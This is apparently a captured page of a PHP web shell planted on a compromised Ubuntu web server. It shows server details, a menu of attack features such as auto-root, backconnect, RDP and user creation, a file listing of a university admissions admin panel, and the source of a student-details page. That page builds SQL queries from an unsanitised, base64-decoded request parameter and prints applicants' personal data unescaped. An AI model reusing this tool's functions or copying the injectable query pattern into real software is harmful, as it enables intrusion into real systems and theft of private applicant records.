Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
adAdminUser.php
7.42
KB
-rw-r--r--
adminDashboard-old.php
5.95
KB
-rw-r--r--
adminDashboard.php
26.61
KB
-rw-r--r--
adminDashboardaug22.php
7.32
KB
-rw-r--r--
adminDashboardjan22.php
6.51
KB
-rw-r--r--
batch.php
344
B
-rw-r--r--
changePassword.php
4.61
KB
-rw-r--r--
class.admin.php
4.23
KB
-rw-r--r--
common.php
2.28
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
delete_member.php
446
B
-rw-r--r--
delete_memberD.php
456
B
-rw-r--r--
error_log
2.03
KB
-rw-r--r--
exportHostelFee.php
1.17
KB
-rw-r--r--
exportStudentApplicatonDetails...
2.64
KB
-rw-r--r--
exportStudentDetails.php
976
B
-rw-r--r--
exportStudentDetailsaug22.php
0
B
-rw-r--r--
exportStudentDetailsjan22.php
754
B
-rw-r--r--
exportTutionFee.php
1.22
KB
-rw-r--r--
exportTutionFeeSearch.php
1.22
KB
-rw-r--r--
exportcseduApplicatonDetails.p...
1.08
KB
-rw-r--r--
exportcseduApplicatonDetailsau...
1.09
KB
-rw-r--r--
exportcseduApplicatonDetailsja...
1.09
KB
-rw-r--r--
exportcseduFeeDetails.php
817
B
-rw-r--r--
exportcseduFeeDetailsaug22.php
830
B
-rw-r--r--
exportcseduFeeDetailsjan22.php
830
B
-rw-r--r--
forgotPassword.php
6.53
KB
-rw-r--r--
fpass.php
2.97
KB
-rw-r--r--
index.php
4.83
KB
-rw-r--r--
invoice.php
5.78
KB
-rw-r--r--
invoiceHostel.php
4.9
KB
-rw-r--r--
jquery.tableToExcel.js
2.76
KB
-rw-r--r--
logout.php
600
B
-rw-r--r--
register.php
6.62
KB
-rw-r--r--
resetpass.php
5.09
KB
-rw-r--r--
tutionFee.php
19.89
KB
-rw-r--r--
updateBatch.php
5.9
KB
-rw-r--r--
updateBatchFee.php
7.1
KB
-rw-r--r--
updateFeeDate.php
9.87
KB
-rw-r--r--
verify.php
2.46
KB
-rw-r--r--
viewApplicationDetailsaug22.ph...
6.18
KB
-rw-r--r--
viewApplicationDetailsjan22.ph...
6.18
KB
-rw-r--r--
viewApplicatonDetails.php
6.16
KB
-rw-r--r--
viewHostelFee.php
9.22
KB
-rw-r--r--
viewPaymentDetails.php
4.86
KB
-rw-r--r--
viewPaymentDetailsaug22.php
4.89
KB
-rw-r--r--
viewPaymentDetailsjan22.php
4.91
KB
-rw-r--r--
viewStudentDetails-old.php
13.75
KB
-rw-r--r--
viewStudentDetails.php
20.86
KB
-rw-r--r--
viewTutionFee.php
9.46
KB
-rw-r--r--
viewapplications.php
13.75
KB
-rw-r--r--
viewapplicationsjan22.php
14.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : viewStudentDetails.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; error_reporting(0); $Token = base64_decode($_GET['in']); $tokenAuth=$_GET['authToken']; ?> <script type="text/javascript">//<![CDATA[ window.onload=function(){ } //]]></script> <script > function printDiv(divName) { var printContents = document.getElementById(divName).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Admin Dashboard <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active"> Admin Dashboard</li> </ol> </section> <?php $result = $DB_con->prepare("SELECT p.*,d.*,r.*,e.* FROM personalinformation p, documents d, studentregistration r, educationalqualification e WHERE e.studentID = p.studentID and p.studentID = r.studentID and r.studentID = d.studentID and p.studentID= d.studentID and p.studentID='$Token' and e.studentID='$Token'"); $result->execute(); $row2 = $result->fetch(); ?> <!-- Main content --> <!-- Main content --> <section class="content"> <div class="row"> <div class="col-md-3"> <!-- Profile Image --> <div class="box box-primary"> <div class="box-body box-profile"> <?php if($row2['photograph']=='') {?> <img class="profile-user-img img-responsive img-circle" src="dist/img/user2-160x160.jpg" alt="User profile picture"> <?php } else { ?> <img class="profile-user-img img-responsive img-circle" src="../uploadDoc/<?php echo $row2['photograph']; ?>" alt="User profile picture"> <?php }?> <h3 class="profile-username text-center"><?php echo $row2['studentName']; ?></h3> <p class="text-muted text-center"><?php echo $row2['studentEmail']; ?></p> <ul class="list-group list-group-unbordered"> <li class="list-group-item"> <b>Mobile No.</b> <a class="pull-right"><?php echo $row2['studentMobile']; ?></a> </li> <li class="list-group-item"> <b>Registration Date</b> <a class="pull-right"><?php echo $row2['regDate']; ?></a> </li> </ul> </div> <!-- /.box-body --> </div> <!-- /.box --> <?php if($row2['studentID']<>'' && $row2['EID']<>'') {?> <!-- About Me Box --> <div class="box box-primary"> <div class="box-header with-border"> <h3 class="box-title">About Me</h3> </div> <!-- /.box-header --> <div class="box-body"> <strong><i class="fa fa-book margin-r-5"></i> Education</strong> <p class="text-muted"> <?php echo $row2['nameofdegree']; ?> </p> <p class="text-muted"> <?php echo $row2['collegeName']; ?> </p> <hr> <strong><i class="fa fa-map-marker margin-r-5"></i> Location</strong> <p class="text-muted"> <?php echo $row2['estate']; ?>, <?php echo $row2['ecountry']; ?></p> <hr> <?php if($row2['nOrganisation']<>'' && $row2['designation']<>'') {?> <strong><i class="fa fa-pencil margin-r-5"></i> Organisation Details</strong> <p class="text-muted"> <?php echo $row2['designation']; ?> </p> <p class="text-muted"> <?php echo $row2['nOrganisation']; ?> </p> <p class="text-muted"> From - <?php echo $row2['pFrom']; ?> </p> <p class="text-muted"> To - <?php echo $row2['pTo']; ?> </p> <hr> <?php }?> <?php if($row2['awards']<>'') {?> <strong><i class="fa fa-file-text-o margin-r-5"></i> Awards</strong> <p><?php echo $row2['awards']; ?></p> <?php }?> </div> <!-- /.box-body --> </div> <?php }?> <!-- /.box --> </div> <!-- /.col --> <div class="col-md-9" > <div class="nav-tabs-custom"> <ul class="nav nav-tabs"> <li class="active"><a href="#printableArea" data-toggle="tab">Print Application Form</a></li> <li ><a href="#documents" data-toggle="tab">Uploaded Documents</a></li> </ul> <div class="tab-content"> <!-- /.tab-pane --> <?php $stmt22 = $DB_con->prepare("SELECT * FROM documents WHERE status='ACTIVE' and studentID='$Token'"); $stmt22->execute(); $row22 = $stmt22->fetch(PDO::FETCH_ASSOC); ?> <div class="tab-pane " id="documents"> <div class="box"> <div class="box-header"> <h3 class="box-title">View / Download Documents</h3> </div> <div class="box-body" > <a class="btn btn-app" href="../uploadDoc/<?php echo $row22['photograph']; ?>" target="_blank"> <i class="fa fa-save"></i> View Photo </a> <a class="btn btn-app" href="../uploadDoc/<?php echo $row22['birthProof']; ?>" target="_blank"> <i class="fa fa-save"></i> View Birth Proof </a> <a class="btn btn-app" href="../uploadDoc/<?php echo $row22['graduationTranscripts']; ?>" target="_blank"> <i class="fa fa-save"></i> View Transcript </a> <?php if($row22['pgCertificate'] ==''){ ?> <a class="btn btn-app" href="#" > <i class="fa fa-save"></i> NA </a> <?php } else { ?> <a class="btn btn-app" href="../uploadDoc/<?php echo $row22['pgCertificate']; ?>" target="_blank"> <i class="fa fa-save"></i> View PG Certifiacte (If applicable) </a> <?php } ?> </div> <!-- /.box-body --> </div> </div> <?php $result = $DB_con->prepare("SELECT * FROM educationalqualification e, personalinformation p,finalsubmit f where p.studentID = e.studentID and f.studentID = p.studentID and e.studentID =f.studentID and p.studentID='$Token' and e.studentID='$Token'"); $result->execute(); $rows = $result->fetch(); ?> <div class="tab-pane active" id="printableArea" > <div class="box"> <div class="box-header"> <h3 class="box-title"> <button class="btn btn-primary hidden-print" onclick="printDiv('printableArea')"><span class="glyphicon glyphicon-print" aria-hidden="true"></span> Print</button> </h3> </div> <div class="box-body" > <table class="table table-bordered"> <tr> <td colspan="4" style="text-align: center;"><img src="dist/img/logo.png" style="width: 335px;"></td> </tr> <tr> <td colspan="4" style="text-align: center;"><h4 style="background-color: #5d5c5c; padding: 10px; color: #fff; text-align: center;"><strong>PG DIPLOMA IN DATA SCIENCE & AI @IIIT-DELHI</strong></h4></td> </tr> <tr> <td colspan="4"><h4 style="background-color: #3fada8; padding: 10px; color: #fff; text-align: center;"><strong>Personal Details</strong></h4></td> </tr> <tr> <td style="width:30%;"><strong>Application Number</strong></td> <td><strong><?php echo "PGD".$rows['studentID']; ?></strong></td> <td colspan="2"><img class="profile-user-img img-responsive " src="../uploadDoc/<?php echo $row2['photograph']; ?>" alt="User profile picture"></td> </tr> <tr> <td style="width:30%;"><strong>Transaction ID</strong></td> <td><?php echo $rows['transactionID']; ?></td> <!--</tr> <tr> --> <td><strong>Student Name</strong></td> <td><?php echo $rows['studentName']; ?></td> </tr> <tr> <td><strong>Mobile Number</strong></td> <td><?php echo $rows['countryCode']; ?>- <?php echo $rows['mobileNumber']; ?></td> <!--</tr> <tr> --> <td><strong>Alternate Contact</strong></td> <td><?php echo $rows['altCountryCode']; ?>- <?php echo $rows['alternateContact']; ?></td> </tr> <tr> <td><strong>Current Address</strong></td> <td><?php echo $rows['currentAddress']; ?></td> <!--</tr> <tr> --> <td><strong>Country</strong></td> <td><?php echo $rows['country']; ?></td> </tr> <tr> <td><strong>State</strong></td> <td><?php echo $rows['state']; ?></td> <!--</tr> <tr> --> <td><strong>City</strong></td> <td><?php echo $rows['district']; ?></td> </tr> <tr> <td><strong>Postal Code</strong></td> <td><?php echo $rows['postalCode']; ?></td> <!--</tr> <tr> --> <td><strong>Gender</strong></td> <td><?php echo $rows['gender']; ?></td> </tr> <tr> <td><strong>Date of birth</strong></td> <td><?php echo $rows['dob']; ?></td> <!--</tr> <tr> --> <td><strong>Country of birth</strong></td> <td><?php echo $rows['birthCountry']; ?></td> </tr> <tr> <td><strong>Citizenship</strong></td> <td><?php echo $rows['citizenship']; ?></td> <!--</tr> <tr> --> <td><strong>Email Id</strong></td> <td><?php echo $rows['emailID']; ?></td> </tr> <tr> <td colspan="4"><h4 style="background-color: #3fada8; padding: 10px; color: #fff; text-align: center;"><strong>Family Details Parent-I (Father/Mother)</strong></h4></td> </tr> <tr> <td><strong>Parent Name</strong></td> <td><?php echo $rows['parentName1']; ?></td> <!--</tr> <tr> --> <td><strong>Mobile Number</strong></td> <td><?php echo $rows['PcountryCode1']; ?>- <?php echo $rows['PmobileNumber1']; ?></td> </tr> <tr> <td><strong>Current Address</strong></td> <td><?php echo $rows['pcurrentAddress']; ?></td> <!--</tr> <tr> --> <td><strong>Country</strong></td> <td><?php echo $rows['pCountry1']; ?></td> </tr> <tr> <td><strong>State</strong></td> <td><?php echo $rows['pState1']; ?></td> <!--</tr> <tr> --> <td><strong>City</strong></td> <td><?php echo $rows['pdistrict1']; ?></td> </tr> <tr> <td><strong>Postal Code</strong></td> <td><?php echo $rows['ppostalCode1']; ?></td> <!--</tr> <tr> --> <td><strong>Citizenship</strong></td> <td><?php echo $rows['pCitizenship1']; ?></td> </tr> <tr> <td><strong>Email Id</strong></td> <td><?php echo $rows['pEmailID']; ?></td> </tr> <?php if($rows['parentName2']<>'') {?> <tr> <td colspan="4"><h4 style="background-color: #3fada8; padding: 10px; color: #fff; text-align: center;"><strong>Family Details Parent-II (Father/Mother)</strong></h4></td> </tr> <tr> <td><strong>Parent Name</strong></td> <td><?php echo $rows['parentName2']; ?></td> <!--</tr> <tr> --> <td><strong>Mobile Number</strong></td> <td><?php echo $rows['pcountrycode2']; ?>- <?php echo $rows['pmobileNumber2']; ?></td> </tr> <tr> <td><strong>Current Address</strong></td> <td><?php echo $rows['pCurrentAddress2']; ?></td> <!--</tr> <tr> --> <td><strong>Country</strong></td> <td><?php echo $rows['pCountry2']; ?></td> </tr> <tr> <td><strong>State</strong></td> <td><?php echo $rows['pState2']; ?></td> <!--</tr> <tr> --> <td><strong>City</strong></td> <td><?php echo $rows['pdistrict2']; ?></td> </tr> <tr> <td><strong>Postal Code</strong></td> <td><?php echo $rows['ppostalCode2']; ?></td> <!--</tr> <tr> --> <td><strong>Citizenship</strong></td> <td><?php echo $rows['pCitizenship2']; ?></td> </tr> <tr> <td><strong>Email Id</strong></td> <td><?php echo $rows['pEmailId2']; ?></td> </tr> <?php } ?> <tr> <td colspan="4"><h4 style="background-color: #3fada8; padding: 10px; color: #fff; text-align: center;"><strong>UG Informations</strong></h4></td> </tr> <tr> <td><strong>College Name</strong></td> <td><?php echo $rows['collegeName']; ?></td> <!--</tr> <tr> --> <td><strong>College Address</strong></td> <td><?php echo $rows['collegeAddress']; ?></td> </tr> <tr> <td><strong>Country</strong></td> <td><?php echo $rows['ecountry']; ?></td> <!--</tr> <tr> --> <td><strong>State</strong></td> <td><?php echo $rows['estate']; ?></td> </tr> <tr> <td><strong>City</strong></td> <td><?php echo $rows['edistrict']; ?></td> <!--</tr> <tr> --> <td><strong>Postal Code</strong></td> <td><?php echo $rows['epostalCode']; ?></td> </tr> <tr> <td><strong>Name of Degree</strong></td> <td><?php echo $rows['nameofdegree']; ?></td> <!--</tr> <tr> --> <td><strong>Discipline</strong></td> <td><?php echo $rows['discipline']; ?></td> </tr> <tr> <td><strong>% of Marks or CGPA</strong></td> <td><?php echo $rows['aggregatePercentage']; ?></td> </tr> <tr> <td colspan="4"><h4 style="background-color: #3fada8; padding: 10px; color: #fff; text-align: center;"><strong>PG Informations</strong></h4></td> </tr> <tr> <td><strong>College Name</strong></td> <td><?php echo $rows['pgcollegeName']; ?></td> <!--</tr> <tr> --> <td><strong>College Address</strong></td> <td><?php echo $rows['pgcollegeAddress']; ?></td> </tr> <tr> <td><strong>Country</strong></td> <td><?php echo $rows['pgCountry']; ?></td> <!--</tr> <tr> --> <td><strong>State</strong></td> <td><?php echo $rows['pgState']; ?></td> </tr> <tr> <td><strong>City</strong></td> <td><?php echo $rows['pgDistrict']; ?></td> <!--</tr> <tr> --> <td><strong>Postal Code</strong></td> <td><?php echo $rows['pgPostalCode']; ?></td> </tr> <tr> <td><strong>Name of Degree</strong></td> <td><?php echo $rows['pgNameofDegree']; ?></td> <!--</tr> <tr> --> <td><strong>Discipline</strong></td> <td><?php echo $rows['pgDiscipline']; ?></td> </tr> <tr> <td><strong>% of Marks or CGPA</strong></td> <td><?php echo $rows['pgAggregatePercentage']; ?></td> </tr> <?php if($rows['nOrganisation']<>'') {?> <tr> <td colspan="4"><h4 style="background-color: #3fada8; padding: 10px; color: #fff; text-align: center;"><strong>Professional Experience( if any)</strong></h4></td> </tr> <tr> <td colspan="4"><strong>Organisation Details Part-A</strong></td> </tr> <tr> <td><strong>Name of Organisation</strong></td> <td><?php echo $rows['nOrganisation']; ?></td> </tr> <tr> <td colspan="4"><strong>Period</strong></td> </tr> <tr> <td><strong>From</strong></td> <td><?php echo $rows['pFrom']; ?></td> <!--</tr> <tr> --> <td><strong>To</strong></td> <td><?php echo $rows['pTo']; ?></td> </tr> <tr> <td><strong>Designation</strong></td> <td><?php echo $rows['designation']; ?></td> </tr> <?php } ?> <?php if($rows['nOrganisationB']<>'') {?> <tr> <td colspan="4"><strong>Organisation Details Part-B</strong></td> </tr> <tr> <td><strong>Name of Organisation</strong></td> <td><?php echo $rows['nOrganisationB']; ?></td> </tr> <tr> <td colspan="4"><strong>Period</strong></td> </tr> <tr> <td><strong>From</strong></td> <td><?php echo $rows['pFromB']; ?></td> <!--</tr> <tr> --> <td><strong>To</strong></td> <td><?php echo $rows['pToB']; ?></td> </tr> <tr> <td><strong>Designation</strong></td> <td><?php echo $rows['designationB']; ?></td> </tr> <?php } ?> <?php if($rows['awards']<>'') {?> <tr> <td colspan="4"><strong>Awards Details</strong></td> </tr> <tr> <td><strong>Awards</strong></td> <td><?php echo $rows['awards']; ?></td> </tr> <?php } ?> <?php if($rows['status']=='ACTIVE') {?> <tr> <td colspan="4"><h4 style="background-color: #3fada8; padding: 10px; color: #fff; text-align: center;"><strong>Declaration</strong></h4></td> </tr> <tr> <td><strong>Full Name</strong></td> <td><?php echo $rows['FullName']; ?></td> <!--</tr> <tr> --> <td><strong>Place</strong></td> <td><?php echo $rows['place']; ?></td> </tr> <tr> <td><strong>Date</strong></td> <td><?php echo $rows['date']; ?></td> </tr> <tr> <td><strong>Declaration</strong></td> <td colspan="3"><?php echo $rows['declaration']; ?>, <p align="justify">I Hereby declare that the particulars furnished above are complete and correct to the best of my knowledge & belief. I understand that if at any stage, it is found that the information given in the application is false or incorrect or I do not satisfy the eligibility criteria, my candidature/appointment is liable to be cancelled.</p> </td> </tr> <?php } ?> </table> </div> <!-- /.box-body --> </div> </div> <!-- /.tab-pane --> </div> <!-- /.tab-content --> </div> <!-- /.nav-tabs-custom --> </div> <!-- /.col --> </div> <!-- /.row --> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?> <script src="jquery.tableToExcel.js"></script>
Close